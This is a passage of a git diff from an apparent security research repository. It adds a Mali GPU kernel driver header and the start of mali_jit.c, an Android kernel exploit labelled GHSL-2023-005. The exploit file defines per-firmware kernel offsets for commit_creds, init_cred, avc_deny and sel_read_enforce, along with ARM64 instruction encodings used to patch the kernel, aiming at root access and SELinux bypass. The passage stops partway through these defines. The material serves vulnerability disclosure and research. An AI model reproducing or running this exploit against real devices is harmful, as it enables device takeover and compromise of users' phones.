+ * Mask of all bits in base_jd_core_req that control the type of a soft job.
+ */
+#define BASE_JD_REQ_SOFT_JOB_TYPE (BASE_JD_REQ_SOFT_JOB | 0x1f)
+
+/* Returns non-zero value if core requirements passed define a soft job or
+ * a dependency only job.
+ */
+#define BASE_JD_REQ_SOFT_JOB_OR_DEP(core_req) \
+ (((core_req) & BASE_JD_REQ_SOFT_JOB) || \
+ ((core_req) & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP)
+
+/**
+ * enum kbase_jd_atom_state
+ *
+ * @KBASE_JD_ATOM_STATE_UNUSED: Atom is not used.
+ * @KBASE_JD_ATOM_STATE_QUEUED: Atom is queued in JD.
+ * @KBASE_JD_ATOM_STATE_IN_JS: Atom has been given to JS (is runnable/running).
+ * @KBASE_JD_ATOM_STATE_HW_COMPLETED: Atom has been completed, but not yet
+ * handed back to job dispatcher for
+ * dependency resolution.
+ * @KBASE_JD_ATOM_STATE_COMPLETED: Atom has been completed, but not yet handed
+ * back to userspace.
+ */
+enum kbase_jd_atom_state {
+ KBASE_JD_ATOM_STATE_UNUSED,
+ KBASE_JD_ATOM_STATE_QUEUED,
+ KBASE_JD_ATOM_STATE_IN_JS,
+ KBASE_JD_ATOM_STATE_HW_COMPLETED,
+ KBASE_JD_ATOM_STATE_COMPLETED
+};
+
+/**
+ * typedef base_atom_id - Type big enough to store an atom number in.
+ */
+typedef __u8 base_atom_id;
+
+/**
+ * struct base_dependency -
+ *
+ * @atom_id: An atom number
+ * @dependency_type: Dependency type
+ */
+struct base_dependency {
+ base_atom_id atom_id;
+ base_jd_dep_type dependency_type;
+};
+
+/**
+ * struct base_jd_fragment - Set of GPU fragment job chains used for rendering.
+ *
+ * @norm_read_norm_write: Job chain for full rendering.
+ * GPU address of a fragment job chain to render in the
+ * circumstance where the tiler job chain did not exceed
+ * its memory usage threshold and no fragment job chain
+ * was previously run for the same renderpass.
+ * It is used no more than once per renderpass.
+ * @norm_read_forced_write: Job chain for starting incremental
+ * rendering.
+ * GPU address of a fragment job chain to render in
+ * the circumstance where the tiler job chain exceeded
+ * its memory usage threshold for the first time and
+ * no fragment job chain was previously run for the
+ * same renderpass.
+ * Writes unresolved multisampled and normally-
+ * discarded output to temporary buffers that must be
+ * read back by a subsequent forced_read job chain
+ * before the renderpass is complete.
+ * It is used no more than once per renderpass.
+ * @forced_read_forced_write: Job chain for continuing incremental
+ * rendering.
+ * GPU address of a fragment job chain to render in
+ * the circumstance where the tiler job chain
+ * exceeded its memory usage threshold again
+ * and a fragment job chain was previously run for
+ * the same renderpass.
+ * Reads unresolved multisampled and
+ * normally-discarded output from temporary buffers
+ * written by a previous forced_write job chain and
+ * writes the same to temporary buffers again.
+ * It is used as many times as required until
+ * rendering completes.
+ * @forced_read_norm_write: Job chain for ending incremental rendering.
+ * GPU address of a fragment job chain to render in the
+ * circumstance where the tiler job chain did not
+ * exceed its memory usage threshold this time and a
+ * fragment job chain was previously run for the same
+ * renderpass.
+ * Reads unresolved multisampled and normally-discarded
+ * output from temporary buffers written by a previous
+ * forced_write job chain in order to complete a
+ * renderpass.
+ * It is used no more than once per renderpass.
+ *
+ * This structure is referenced by the main atom structure if
+ * BASE_JD_REQ_END_RENDERPASS is set in the base_jd_core_req.
+ */
+struct base_jd_fragment {
+ __u64 norm_read_norm_write;
+ __u64 norm_read_forced_write;
+ __u64 forced_read_forced_write;
+ __u64 forced_read_norm_write;
+};
+
+/**
+ * typedef base_jd_prio - Base Atom priority.
+ *
+ * Only certain priority levels are actually implemented, as specified by the
+ * BASE_JD_PRIO_<...> definitions below. It is undefined to use a priority
+ * level that is not one of those defined below.
+ *
+ * Priority levels only affect scheduling after the atoms have had dependencies
+ * resolved. For example, a low priority atom that has had its dependencies
+ * resolved might run before a higher priority atom that has not had its
+ * dependencies resolved.
+ *
+ * In general, fragment atoms do not affect non-fragment atoms with
+ * lower priorities, and vice versa. One exception is that there is only one
+ * priority value for each context. So a high-priority (e.g.) fragment atom
+ * could increase its context priority, causing its non-fragment atoms to also
+ * be scheduled sooner.
+ *
+ * The atoms are scheduled as follows with respect to their priorities:
+ * * Let atoms 'X' and 'Y' be for the same job slot who have dependencies
+ * resolved, and atom 'X' has a higher priority than atom 'Y'
+ * * If atom 'Y' is currently running on the HW, then it is interrupted to
+ * allow atom 'X' to run soon after
+ * * If instead neither atom 'Y' nor atom 'X' are running, then when choosing
+ * the next atom to run, atom 'X' will always be chosen instead of atom 'Y'
+ * * Any two atoms that have the same priority could run in any order with
+ * respect to each other. That is, there is no ordering constraint between
+ * atoms of the same priority.
+ *
+ * The sysfs file 'js_ctx_scheduling_mode' is used to control how atoms are
+ * scheduled between contexts. The default value, 0, will cause higher-priority
+ * atoms to be scheduled first, regardless of their context. The value 1 will
+ * use a round-robin algorithm when deciding which context's atoms to schedule
+ * next, so higher-priority atoms can only preempt lower priority atoms within
+ * the same context. See KBASE_JS_SYSTEM_PRIORITY_MODE and
+ * KBASE_JS_PROCESS_LOCAL_PRIORITY_MODE for more details.
+ */
+typedef __u8 base_jd_prio;
+
+/* Medium atom priority. This is a priority higher than BASE_JD_PRIO_LOW */
+#define BASE_JD_PRIO_MEDIUM ((base_jd_prio)0)
+/* High atom priority. This is a priority higher than BASE_JD_PRIO_MEDIUM and
+ * BASE_JD_PRIO_LOW
+ */
+#define BASE_JD_PRIO_HIGH ((base_jd_prio)1)
+/* Low atom priority. */
+#define BASE_JD_PRIO_LOW ((base_jd_prio)2)
+/* Real-Time atom priority. This is a priority higher than BASE_JD_PRIO_HIGH,
+ * BASE_JD_PRIO_MEDIUM, and BASE_JD_PRIO_LOW
+ */
+#define BASE_JD_PRIO_REALTIME ((base_jd_prio)3)
+
+/* Count of the number of priority levels. This itself is not a valid
+ * base_jd_prio setting
+ */
+#define BASE_JD_NR_PRIO_LEVELS 4
+
+/**
+ * struct base_jd_atom_v2 - Node of a dependency graph used to submit a
+ * GPU job chain or soft-job to the kernel driver.
+ *
+ * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
+ * is set in the base_jd_core_req) the CPU address of a
+ * base_jd_fragment object.
+ * @udata: User data.
+ * @extres_list: List of external resources.
+ * @nr_extres: Number of external resources or JIT allocations.
+ * @jit_id: Zero-terminated array of IDs of just-in-time memory
+ * allocations written to by the atom. When the atom
+ * completes, the value stored at the
+ * &struct_base_jit_alloc_info.heap_info_gpu_addr of
+ * each allocation is read in order to enforce an
+ * overall physical memory usage limit.
+ * @pre_dep: Pre-dependencies. One need to use SETTER function to assign
+ * this field; this is done in order to reduce possibility of
+ * improper assignment of a dependency field.
+ * @atom_number: Unique number to identify the atom.
+ * @prio: Atom priority. Refer to base_jd_prio for more details.
+ * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
+ * specified.
+ * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
+ * @core_req: Core requirements.
+ * @renderpass_id: Renderpass identifier used to associate an atom that has
+ * BASE_JD_REQ_START_RENDERPASS set in its core requirements
+ * with an atom that has BASE_JD_REQ_END_RENDERPASS set.
+ * @padding: Unused. Must be zero.
+ *
+ * This structure has changed since UK 10.2 for which base_jd_core_req was a
+ * __u16 value.
+ *
+ * In UK 10.3 a core_req field of a __u32 type was added to the end of the
+ * structure, and the place in the structure previously occupied by __u16
+ * core_req was kept but renamed to compat_core_req.
+ *
+ * From UK 11.20 - compat_core_req is now occupied by __u8 jit_id[2].
+ * Compatibility with UK 10.x from UK 11.y is not handled because
+ * the major version increase prevents this.
+ *
+ * For UK 11.20 jit_id[2] must be initialized to zero.
+ */
+struct base_jd_atom_v2 {
+ __u64 jc;
+ struct base_jd_udata udata;
+ __u64 extres_list;
+ __u16 nr_extres;
+ __u8 jit_id[2];
+ struct base_dependency pre_dep[2];
+ base_atom_id atom_number;
+ base_jd_prio prio;
+ __u8 device_nr;
+ __u8 jobslot;
+ base_jd_core_req core_req;
+ __u8 renderpass_id;
+ __u8 padding[7];
+};
+
+/**
+ * struct base_jd_atom - Same as base_jd_atom_v2, but has an extra seq_nr
+ * at the beginning.
+ *
+ * @seq_nr: Sequence number of logical grouping of atoms.
+ * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
+ * is set in the base_jd_core_req) the CPU address of a
+ * base_jd_fragment object.
+ * @udata: User data.
+ * @extres_list: List of external resources.
+ * @nr_extres: Number of external resources or JIT allocations.
+ * @jit_id: Zero-terminated array of IDs of just-in-time memory
+ * allocations written to by the atom. When the atom
+ * completes, the value stored at the
+ * &struct_base_jit_alloc_info.heap_info_gpu_addr of
+ * each allocation is read in order to enforce an
+ * overall physical memory usage limit.
+ * @pre_dep: Pre-dependencies. One needs to use a SETTER function to assign
+ * this field; this is done in order to reduce possibility of
+ * improper assignment of a dependency field.
+ * @atom_number: Unique number to identify the atom.
+ * @prio: Atom priority. Refer to base_jd_prio for more details.
+ * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
+ * specified.
+ * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
+ * @core_req: Core requirements.
+ * @renderpass_id: Renderpass identifier used to associate an atom that has
+ * BASE_JD_REQ_START_RENDERPASS set in its core requirements
+ * with an atom that has BASE_JD_REQ_END_RENDERPASS set.
+ * @padding: Unused. Must be zero.
+ */
+/* Same ABI as struct base_jd_atom_v2 with an extra leading seq_nr; see the
+ * kernel-doc block above. Layout must match the kernel driver exactly. */
+typedef struct base_jd_atom {
+	__u64 seq_nr;			/* sequence number of logical grouping of atoms */
+	__u64 jc;
+	struct base_jd_udata udata;
+	__u64 extres_list;
+	__u16 nr_extres;
+	__u8 jit_id[2];
+	struct base_dependency pre_dep[2];
+	base_atom_id atom_number;
+	base_jd_prio prio;
+	__u8 device_nr;
+	__u8 jobslot;
+	base_jd_core_req core_req;
+	__u8 renderpass_id;
+	__u8 padding[7];		/* must be zero */
+} base_jd_atom;
+
+/* Descriptor for a just-in-time GPU memory allocation. In this exploit it is
+ * handed to the driver through the jc pointer of a BASE_JD_REQ_SOFT_JIT_ALLOC
+ * atom (see jit_allocate() in mali_jit.c). */
+struct base_jit_alloc_info {
+	__u64 gpu_alloc_addr;	/* address where the allocated GPU VA is reported back */
+	__u64 va_pages;		/* virtual address range size, in pages */
+	__u64 commit_pages;	/* initially committed (physically backed) pages */
+	__u64 extension;	/* on-demand growth step — presumably in pages; TODO confirm */
+	__u8 id;		/* JIT allocation ID */
+	__u8 bin_id;
+	__u8 max_allocations;
+	__u8 flags;
+	__u8 padding[2];
+	__u16 usage_id;
+	__u64 heap_info_gpu_addr;	/* read on completion to enforce the usage limit
+					 * (see kernel-doc for base_jd_atom above) */
+};
+
+/* Job chain event code bits
+ * Defines the bits used to create ::base_jd_event_code. Per the encoding
+ * documented below: bit 15 = kernel-only, bit 14 = software event,
+ * bit 13 = success, bits 12:11 = event type, bits 10:0 = subtype.
+ */
+enum {
+	BASE_JD_SW_EVENT_KERNEL = (1u << 15), /* Kernel side event */
+	BASE_JD_SW_EVENT = (1u << 14), /* SW defined event */
+	/* Event indicates success (SW events only) */
+	BASE_JD_SW_EVENT_SUCCESS = (1u << 13),
+	BASE_JD_SW_EVENT_JOB = (0u << 11), /* Job related event */
+	BASE_JD_SW_EVENT_BAG = (1u << 11), /* Bag related event */
+	BASE_JD_SW_EVENT_INFO = (2u << 11), /* Misc/info event */
+	BASE_JD_SW_EVENT_RESERVED = (3u << 11), /* Reserved event type */
+	/* Mask to extract the type from an event code */
+	BASE_JD_SW_EVENT_TYPE_MASK = (3u << 11)
+};
+
+/**
+ * enum base_jd_event_code - Job chain event codes
+ *
+ * @BASE_JD_EVENT_RANGE_HW_NONFAULT_START: Start of hardware non-fault status
+ * codes.
+ * Obscurely, BASE_JD_EVENT_TERMINATED
+ * indicates a real fault, because the
+ * job was hard-stopped.
+ * @BASE_JD_EVENT_NOT_STARTED: Can't be seen by userspace, treated as
+ * 'previous job done'.
+ * @BASE_JD_EVENT_STOPPED: Can't be seen by userspace, becomes
+ * TERMINATED, DONE or JOB_CANCELLED.
+ * @BASE_JD_EVENT_TERMINATED: This is actually a fault status code - the job
+ * was hard stopped.
+ * @BASE_JD_EVENT_ACTIVE: Can't be seen by userspace, jobs only returned on
+ * complete/fail/cancel.
+ * @BASE_JD_EVENT_RANGE_HW_NONFAULT_END: End of hardware non-fault status codes.
+ * Obscurely, BASE_JD_EVENT_TERMINATED
+ * indicates a real fault,
+ * because the job was hard-stopped.
+ * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START: Start of hardware fault and
+ * software error status codes.
+ * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END: End of hardware fault and
+ * software error status codes.
+ * @BASE_JD_EVENT_RANGE_SW_SUCCESS_START: Start of software success status
+ * codes.
+ * @BASE_JD_EVENT_RANGE_SW_SUCCESS_END: End of software success status codes.
+ * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_START: Start of kernel-only status codes.
+ * Such codes are never returned to
+ * user-space.
+ * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_END: End of kernel-only status codes.
+ * @BASE_JD_EVENT_DONE: atom has completed successfully
+ * @BASE_JD_EVENT_JOB_CONFIG_FAULT: Atom dependencies configuration error which
+ * shall result in a failed atom
+ * @BASE_JD_EVENT_JOB_POWER_FAULT: The job could not be executed because the
+ * part of the memory system required to access
+ * job descriptors was not powered on
+ * @BASE_JD_EVENT_JOB_READ_FAULT: Reading a job descriptor into the Job
+ * manager failed
+ * @BASE_JD_EVENT_JOB_WRITE_FAULT: Writing a job descriptor from the Job
+ * manager failed
+ * @BASE_JD_EVENT_JOB_AFFINITY_FAULT: The job could not be executed because the
+ * specified affinity mask does not intersect
+ * any available cores
+ * @BASE_JD_EVENT_JOB_BUS_FAULT: A bus access failed while executing a job
+ * @BASE_JD_EVENT_INSTR_INVALID_PC: A shader instruction with an illegal program
+ * counter was executed.
+ * @BASE_JD_EVENT_INSTR_INVALID_ENC: A shader instruction with an illegal
+ * encoding was executed.
+ * @BASE_JD_EVENT_INSTR_TYPE_MISMATCH: A shader instruction was executed where
+ * the instruction encoding did not match the
+ * instruction type encoded in the program
+ * counter.
+ * @BASE_JD_EVENT_INSTR_OPERAND_FAULT: A shader instruction was executed that
+ * contained invalid combinations of operands.
+ * @BASE_JD_EVENT_INSTR_TLS_FAULT: A shader instruction was executed that tried
+ * to access the thread local storage section
+ * of another thread.
+ * @BASE_JD_EVENT_INSTR_ALIGN_FAULT: A shader instruction was executed that
+ * tried to do an unsupported unaligned memory
+ * access.
+ * @BASE_JD_EVENT_INSTR_BARRIER_FAULT: A shader instruction was executed that
+ * failed to complete an instruction barrier.
+ * @BASE_JD_EVENT_DATA_INVALID_FAULT: Any data structure read as part of the job
+ * contains invalid combinations of data.
+ * @BASE_JD_EVENT_TILE_RANGE_FAULT: Tile or fragment shading was asked to
+ * process a tile that is entirely outside the
+ * bounding box of the frame.
+ * @BASE_JD_EVENT_STATE_FAULT: Matches ADDR_RANGE_FAULT. A virtual address
+ * has been found that exceeds the virtual
+ * address range.
+ * @BASE_JD_EVENT_OUT_OF_MEMORY: The tiler ran out of memory when executing a job.
+ * @BASE_JD_EVENT_UNKNOWN: If multiple jobs in a job chain fail, only
+ * the first one the reports an error will set
+ * and return full error information.
+ * Subsequent failing jobs will not update the
+ * error status registers, and may write an
+ * error status of UNKNOWN.
+ * @BASE_JD_EVENT_DELAYED_BUS_FAULT: The GPU received a bus fault for access to
+ * physical memory where the original virtual
+ * address is no longer available.
+ * @BASE_JD_EVENT_SHAREABILITY_FAULT: Matches GPU_SHAREABILITY_FAULT. A cache
+ * has detected that the same line has been
+ * accessed as both shareable and non-shareable
+ * memory from inside the GPU.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1: A memory access hit an invalid table
+ * entry at level 1 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2: A memory access hit an invalid table
+ * entry at level 2 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3: A memory access hit an invalid table
+ * entry at level 3 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4: A memory access hit an invalid table
+ * entry at level 4 of the translation table.
+ * @BASE_JD_EVENT_PERMISSION_FAULT: A memory access could not be allowed due to
+ * the permission flags set in translation
+ * table
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1: A bus fault occurred while reading
+ * level 0 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2: A bus fault occurred while reading
+ * level 1 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3: A bus fault occurred while reading
+ * level 2 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4: A bus fault occurred while reading
+ * level 3 of the translation tables.
+ * @BASE_JD_EVENT_ACCESS_FLAG: Matches ACCESS_FLAG_0. A memory access hit a
+ * translation table entry with the ACCESS_FLAG
+ * bit set to zero in level 0 of the
+ * page table, and the DISABLE_AF_FAULT flag
+ * was not set.
+ * @BASE_JD_EVENT_MEM_GROWTH_FAILED: raised for JIT_ALLOC atoms that failed to
+ * grow memory on demand
+ * @BASE_JD_EVENT_JOB_CANCELLED: raised when this atom was hard-stopped or its
+ * dependencies failed
+ * @BASE_JD_EVENT_JOB_INVALID: raised for many reasons, including invalid data
+ * in the atom which overlaps with
+ * BASE_JD_EVENT_JOB_CONFIG_FAULT, or if the
+ * platform doesn't support the feature specified in
+ * the atom.
+ * @BASE_JD_EVENT_PM_EVENT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_TIMED_OUT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_BAG_INVALID: TODO: remove as it's not used
+ * @BASE_JD_EVENT_PROGRESS_REPORT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_BAG_DONE: TODO: remove as it's not used
+ * @BASE_JD_EVENT_DRV_TERMINATED: this is a special event generated to indicate
+ * to userspace that the KBase context has been
+ * destroyed and Base should stop listening for
+ * further events
+ * @BASE_JD_EVENT_REMOVED_FROM_NEXT: raised when an atom that was configured in
+ * the GPU has to be retried (but it has not
+ * started) due to e.g., GPU reset
+ * @BASE_JD_EVENT_END_RP_DONE: this is used for incremental rendering to signal
+ * the completion of a renderpass. This value
+ * shouldn't be returned to userspace but I haven't
+ * seen where it is reset back to JD_EVENT_DONE.
+ *
+ * HW and low-level SW events are represented by event codes.
+ * The status of jobs which succeeded are also represented by
+ * an event code (see @BASE_JD_EVENT_DONE).
+ * Events are usually reported as part of a &struct base_jd_event.
+ *
+ * The event codes are encoded in the following way:
+ * * 10:0 - subtype
+ * * 12:11 - type
+ * * 13 - SW success (only valid if the SW bit is set)
+ * * 14 - SW event (HW event if not set)
+ * * 15 - Kernel event (should never be seen in userspace)
+ *
+ * Events are split up into ranges as follows:
+ * * BASE_JD_EVENT_RANGE_&lt;description&gt;_START
+ * * BASE_JD_EVENT_RANGE_&lt;description&gt;_END
+ *
+ * A code is in &lt;description&gt;'s range when:
+ * BASE_JD_EVENT_RANGE_&lt;description&gt;_START <= code <
+ * BASE_JD_EVENT_RANGE_&lt;description&gt;_END
+ *
+ * Ranges can be asserted for adjacency by testing that the END of the previous
+ * is equal to the START of the next. This is useful for optimizing some tests
+ * for range.
+ *
+ * A limitation is that the last member of this enum must explicitly be handled
+ * (with an assert-unreachable statement) in switch statements that use
+ * variables of this type. Otherwise, the compiler warns that we have not
+ * handled that enum value.
+ */
+enum base_jd_event_code {
+	/* HW defined exceptions */
+	BASE_JD_EVENT_RANGE_HW_NONFAULT_START = 0,
+
+	/* non-fatal exceptions (codes in [0x00, 0x40) are non-fault HW statuses) */
+	BASE_JD_EVENT_NOT_STARTED = 0x00, /* aliases RANGE_HW_NONFAULT_START */
+	BASE_JD_EVENT_DONE = 0x01,
+	BASE_JD_EVENT_STOPPED = 0x03,
+	BASE_JD_EVENT_TERMINATED = 0x04,
+	BASE_JD_EVENT_ACTIVE = 0x08,
+
+	/* adjacent ranges share a boundary value so range checks can be chained */
+	BASE_JD_EVENT_RANGE_HW_NONFAULT_END = 0x40,
+	BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START = 0x40,
+
+	/* job exceptions */
+	BASE_JD_EVENT_JOB_CONFIG_FAULT = 0x40,
+	BASE_JD_EVENT_JOB_POWER_FAULT = 0x41,
+	BASE_JD_EVENT_JOB_READ_FAULT = 0x42,
+	BASE_JD_EVENT_JOB_WRITE_FAULT = 0x43,
+	BASE_JD_EVENT_JOB_AFFINITY_FAULT = 0x44,
+	BASE_JD_EVENT_JOB_BUS_FAULT = 0x48,
+	BASE_JD_EVENT_INSTR_INVALID_PC = 0x50,
+	BASE_JD_EVENT_INSTR_INVALID_ENC = 0x51,
+	BASE_JD_EVENT_INSTR_TYPE_MISMATCH = 0x52,
+	BASE_JD_EVENT_INSTR_OPERAND_FAULT = 0x53,
+	BASE_JD_EVENT_INSTR_TLS_FAULT = 0x54,
+	BASE_JD_EVENT_INSTR_BARRIER_FAULT = 0x55,
+	BASE_JD_EVENT_INSTR_ALIGN_FAULT = 0x56,
+	BASE_JD_EVENT_DATA_INVALID_FAULT = 0x58,
+	BASE_JD_EVENT_TILE_RANGE_FAULT = 0x59,
+	BASE_JD_EVENT_STATE_FAULT = 0x5A,
+	BASE_JD_EVENT_OUT_OF_MEMORY = 0x60,
+	BASE_JD_EVENT_UNKNOWN = 0x7F,
+
+	/* GPU exceptions */
+	BASE_JD_EVENT_DELAYED_BUS_FAULT = 0x80,
+	BASE_JD_EVENT_SHAREABILITY_FAULT = 0x88,
+
+	/* MMU exceptions */
+	BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1 = 0xC1,
+	BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2 = 0xC2,
+	BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3 = 0xC3,
+	BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4 = 0xC4,
+	BASE_JD_EVENT_PERMISSION_FAULT = 0xC8,
+	BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1 = 0xD1,
+	BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2 = 0xD2,
+	BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3 = 0xD3,
+	BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4 = 0xD4,
+	BASE_JD_EVENT_ACCESS_FLAG = 0xD8,
+
+	/* SW defined exceptions: composed from the event-code bits enum above
+	 * (type in bits 12:11, subtype in bits 10:0) */
+	BASE_JD_EVENT_MEM_GROWTH_FAILED =
+		BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x000,
+	BASE_JD_EVENT_TIMED_OUT =
+		BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x001,
+	BASE_JD_EVENT_JOB_CANCELLED =
+		BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x002,
+	BASE_JD_EVENT_JOB_INVALID =
+		BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x003,
+	BASE_JD_EVENT_PM_EVENT =
+		BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x004,
+
+	BASE_JD_EVENT_BAG_INVALID =
+		BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_BAG | 0x003,
+
+	BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END = BASE_JD_SW_EVENT |
+		BASE_JD_SW_EVENT_RESERVED | 0x3FF,
+
+	BASE_JD_EVENT_RANGE_SW_SUCCESS_START = BASE_JD_SW_EVENT |
+		BASE_JD_SW_EVENT_SUCCESS | 0x000,
+
+	BASE_JD_EVENT_PROGRESS_REPORT = BASE_JD_SW_EVENT |
+		BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_JOB | 0x000,
+	BASE_JD_EVENT_BAG_DONE = BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS |
+		BASE_JD_SW_EVENT_BAG | 0x000,
+	BASE_JD_EVENT_DRV_TERMINATED = BASE_JD_SW_EVENT |
+		BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_INFO | 0x000,
+
+	BASE_JD_EVENT_RANGE_SW_SUCCESS_END = BASE_JD_SW_EVENT |
+		BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_RESERVED | 0x3FF,
+
+	/* kernel-only codes: never returned to user space */
+	BASE_JD_EVENT_RANGE_KERNEL_ONLY_START = BASE_JD_SW_EVENT |
+		BASE_JD_SW_EVENT_KERNEL | 0x000,
+	BASE_JD_EVENT_REMOVED_FROM_NEXT = BASE_JD_SW_EVENT |
+		BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x000,
+	BASE_JD_EVENT_END_RP_DONE = BASE_JD_SW_EVENT |
+		BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x001,
+
+	BASE_JD_EVENT_RANGE_KERNEL_ONLY_END = BASE_JD_SW_EVENT |
+		BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_RESERVED | 0x3FF
+};
+
+/**
+ * struct base_jd_event_v2 - Event reporting structure
+ *
+ * @event_code: event code.
+ * @atom_number: the atom number that has completed.
+ * @udata: user data.
+ *
+ * This structure is used by the kernel driver to report information
+ * about GPU events. They can either be HW-specific events or low-level
+ * SW events, such as job-chain completion.
+ *
+ * The event code contains an event type field which can be extracted
+ * by ANDing with BASE_JD_SW_EVENT_TYPE_MASK.
+ */
+/* Event record returned by the kernel driver; see kernel-doc above. */
+struct base_jd_event_v2 {
+	enum base_jd_event_code event_code;	/* HW or SW event code */
+	base_atom_id atom_number;		/* atom that completed */
+	struct base_jd_udata udata;		/* user data from the submitted atom */
+};
+
+/**
+ * struct base_dump_cpu_gpu_counters - Structure for
+ * BASE_JD_REQ_SOFT_DUMP_CPU_GPU_COUNTERS
+ * jobs.
+ * @system_time: gpu timestamp
+ * @cycle_counter: gpu cycle count
+ * @sec: cpu time(sec)
+ * @usec: cpu time(usec)
+ * @padding: padding
+ *
+ * This structure is stored into the memory pointed to by the @jc field
+ * of &struct base_jd_atom.
+ *
+ * It must not occupy the same CPU cache line(s) as any neighboring data.
+ * This is to avoid cases where access to pages containing the structure
+ * is shared between cached and un-cached memory regions, which would
+ * cause memory corruption.
+ */
+
+struct base_dump_cpu_gpu_counters {
+	__u64 system_time;	/* gpu timestamp */
+	__u64 cycle_counter;	/* gpu cycle count */
+	__u64 sec;		/* cpu time (seconds) */
+	__u32 usec;		/* cpu time (microseconds) */
+	__u8 padding[36];	/* pads the struct to 64 bytes so it does not share a
+				 * CPU cache line with neighbouring data (see the
+				 * kernel-doc above for why that matters) */
+};
+
+#endif /* _UAPI_BASE_JM_KERNEL_H_ */
+
diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/mali_jit.c b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_jit.c
new file mode 100644
index 0000000..ba87406
--- /dev/null
+++ b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_jit.c
@@ -0,0 +1,659 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <errno.h>
+#include <err.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+#include "stdbool.h"
+#include <pthread.h>
+#include <sys/types.h>
+#include <sys/system_properties.h>
+
+#include "mali.h"
+#include "mali_base_jm_kernel.h"
+#include "midgard.h"
+
+#ifdef SHELL
+#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
+#else
+#include <android/log.h>
+#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
+
+#endif //SHELL
+
+#define MALI "/dev/mali0"
+
+#define PAGE_SHIFT 12
+
+#define PFN_DOWN(x) ((x) >> PAGE_SHIFT)
+
+#define FREED_NUM 1
+
+#define FLUSH_SIZE (0x1000 * 0x1000)
+
+#define POOL_SIZE 16384
+
+#define RESERVED_SIZE 32
+
+#define TOTAL_RESERVED_SIZE 1024
+
+#define FLUSH_REGION_SIZE 500
+
+#define GROW_SIZE 0x2000
+
+#define RECLAIM_SIZE (3 * POOL_SIZE)
+
+#define JIT_PAGES 0x1000000
+
+#define JIT_GROUP_ID 1
+
+#define KERNEL_BASE 0x80000000
+
+#define OVERWRITE_INDEX 256
+
+#define ADRP_INIT_INDEX 0
+
+#define ADD_INIT_INDEX 1
+
+#define ADRP_COMMIT_INDEX 2
+
+#define ADD_COMMIT_INDEX 3
+
+#define AVC_DENY_2211 0x8d6810
+
+#define SEL_READ_ENFORCE_2211 0x8ea124
+
+#define INIT_CRED_2211 0x2fd1388
+
+#define COMMIT_CREDS_2211 0x17ada4
+
+#define ADD_INIT_2211 0x910e2000 //add x0, x0, #0x388
+
+#define ADD_COMMIT_2211 0x91369108 //add x8, x8, #0xda4
+
+#define AVC_DENY_2212 0x8ba710
+
+#define SEL_READ_ENFORCE_2212 0x8cdfd4
+
+#define INIT_CRED_2212 0x2fd1418
+
+#define COMMIT_CREDS_2212 0x177ee4
+
+#define ADD_INIT_2212 0x91106000 //add x0, x0, #0x418
+
+#define ADD_COMMIT_2212 0x913b9108 //add x8, x8, #0xee4
+
+#define AVC_DENY_2301 0x8ba710
+
+#define SEL_READ_ENFORCE_2301 0x8cdfd4
+
+#define INIT_CRED_2301 0x2fd1418
+
+#define COMMIT_CREDS_2301 0x177ee4
+
